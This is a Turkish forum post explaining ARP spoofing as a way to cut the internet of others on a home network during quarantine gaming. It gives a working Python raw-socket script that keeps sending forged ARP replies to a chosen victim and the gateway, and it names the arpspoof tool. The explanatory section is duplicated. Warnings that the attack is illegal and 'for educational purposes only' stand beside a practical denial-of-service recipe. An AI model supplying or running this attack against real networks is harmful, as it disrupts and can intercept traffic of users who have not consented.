Uzman Üye
Önemli NOT: Teknik olarak bu işlem bir saldırı olup kendinize ait olmayan bir ağ üzerinde yapıp yakalanırsanız 2-4 yıl arası yargılanabilirsiniz. Saldırının dezavantajı, işi bilen kişiye karşı kendi kimliğinizi kabak gibi ortada bırakıyor. Kendi evinizde yapın başkasına bulaşmayın !!!
Malum evden çıkamıyoruz ve bir çoğumuzun internet altyapısı çok iyi değil. Karantina döneminde en keyifli vakit geçirilen oyunlar online oyunlar doğal olarak fakat aynı anda evde birisi film izlemeye veya birşeyler indirmeye çalıştığında oyunumuzun içine edebiliyor.
Konuya gelirsek evlerimizdeki internet dağıtımları routerlar üzerinden gerçekleşmekte. İnternete bağlandığımız cihazlar ARP tablosu adı verilen tablolarda sisteme bağlı diğer cihazları ve en önemlisi router yani gateway in ip adresini de tutmakta. Router belirli zaman aralıklarıyla ağ üzerinde bulunan cihazlara hangi ip adresindeki cihaza internet paketlerini göndererek haberleşmesi gerektiği bilgisini iletir ( yani kendisini ). Biz bu noktada devreye girip saldırmak istediğimiz cihaza artık paketleri bana göndericeksin diye aynı mesaj ile paketleri kendi bilgisayarımıza yönlendirdiğimizde gelen paketlerede yanıt vermeyeceğimiz için karşı tarafın interneti kesilmiş olacak. Bağlantının nasıl olduğu hiç farketmiyor siz kablosuz hedef kablolu bile bağlanabilir. Modem arayüzü vb. yerlere girmekte gerekmiyor.
Ne yaptığı konusunda bir fikri olamayanlar için işin aktif bilgi toplama tarafını anlatmıyorum. Kodla uğraşmadan zahmetsiz yapmak isterseniz Linux için "arpspoof" adında bir toolda mevcut.
Python kodu:
Bu kodları sadece eğitim amaçlı kullanınız.
Malum evden çıkamıyoruz ve bir çoğumuzun internet altyapısı çok iyi değil. Karantina döneminde en keyifli vakit geçirilen oyunlar online oyunlar doğal olarak fakat aynı anda evde birisi film izlemeye veya birşeyler indirmeye çalıştığında oyunumuzun içine edebiliyor.
Konuya gelirsek evlerimizdeki internet dağıtımları routerlar üzerinden gerçekleşmekte. İnternete bağlandığımız cihazlar ARP tablosu adı verilen tablolarda sisteme bağlı diğer cihazları ve en önemlisi router yani gateway in ip adresini de tutmakta. Router belirli zaman aralıklarıyla ağ üzerinde bulunan cihazlara hangi ip adresindeki cihaza internet paketlerini göndererek haberleşmesi gerektiği bilgisini iletir ( yani kendisini ). Biz bu noktada devreye girip saldırmak istediğimiz cihaza artık paketleri bana göndericeksin diye aynı mesaj ile paketleri kendi bilgisayarımıza yönlendirdiğimizde gelen paketlerede yanıt vermeyeceğimiz için karşı tarafın interneti kesilmiş olacak. Bağlantının nasıl olduğu hiç farketmiyor siz kablosuz hedef kablolu bile bağlanabilir. Modem arayüzü vb. yerlere girmekte gerekmiyor.
Ne yaptığı konusunda bir fikri olamayanlar için işin aktif bilgi toplama tarafını anlatmıyorum. Kodla uğraşmadan zahmetsiz yapmak isterseniz Linux için "arpspoof" adında bir toolda mevcut.
Python kodu:
Python:
import socket
import struct
import binascii
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
s.bind(("eth0", socket.htons(0x0800)))
#Saldırgan mac, kurban mac, router mac (Kendinize göre editleyin)
attckmac = '\xff\xff\xff\xff\xff\xff'
victimmac = '\xff\xff\xff\xff\xff\xff'
gatewaymac = '\xff\xff\xff\xff\xff\xff'
code = '\x08\x06'
ethernet1 = victimmac + attckmac + code
ethernet2 = gatewaymac + attckmac + code
htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'
#Kurban ip, yeni gateway ip
gateway_ip = '192.168.1.x'
victim_ip = '192.168.1.x'
gatewayip = socket.inet_aton ( gateway_ip )
victimip = socket.inet_aton ( victim_ip )
victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip
gateway_ARP = ethernet2 + htype + protype + hsize + psize + opcode + attckmac + victimip + gatewaymac + gatewayip
while 1:
s.send(victim_ARP)
s.send(gateway_ARP)Bu kodları sadece eğitim amaçlı kullanınız.
Moderatörün son düzenlenenleri: